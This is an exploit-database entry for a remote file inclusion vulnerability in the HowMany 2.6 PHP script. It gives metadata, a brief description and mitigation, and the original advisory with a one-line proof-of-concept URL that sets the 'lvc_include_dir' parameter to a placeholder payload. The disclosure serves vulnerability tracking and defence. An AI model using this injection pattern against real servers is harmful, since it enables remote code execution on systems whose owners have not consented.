header-logo
Suggest Exploit
vendor:
HowMany
by:
indoushka
9.3
CVSS
HIGH
RFI
98
CWE
Product Name: HowMany
Affected Version From: 2.6
Affected Version To: 2.6
Patch Exists: NO
Related CWE: N/A
CPE: a:scripts-zone:howmany:2.6
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)
2008

HowMany V2.6 RFI Vulnerability

The vulnerability exists due to insufficient sanitization of user-supplied input in the 'lvc_include_dir' parameter of the 'howex.php3' script. A remote attacker can execute arbitrary PHP code on the vulnerable system by sending a specially crafted HTTP request with a malicious 'lvc_include_dir' parameter.

Mitigation:

Input validation should be used to prevent the execution of malicious code.
Source

Exploit-DB raw data:

========================================================================================                  
| # Title    : HowMany V2.6 RFI Vulnerability                                          |
| # Author   : indoushka                                                               |
| # email    : indoushka@hotmail.com                                                   |
| # Home     : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)       |
| # Web Site : www.iq-ty.com                                                           |
| # Script   : HowMany V2.6 http://www.scripts-zone.com                                |
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)       |
| # Bug      : RFI                                                                     | 
======================      Exploit By indoushka       =================================
| # Exploit  : 
| 
| 1-http://server/1/howex.php3?lvc_include_dir=[EV!L]
|
================================   Dz-Ghost Team   ========================================
Greetz : all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 |
-------------------------------------------------------------------------------------------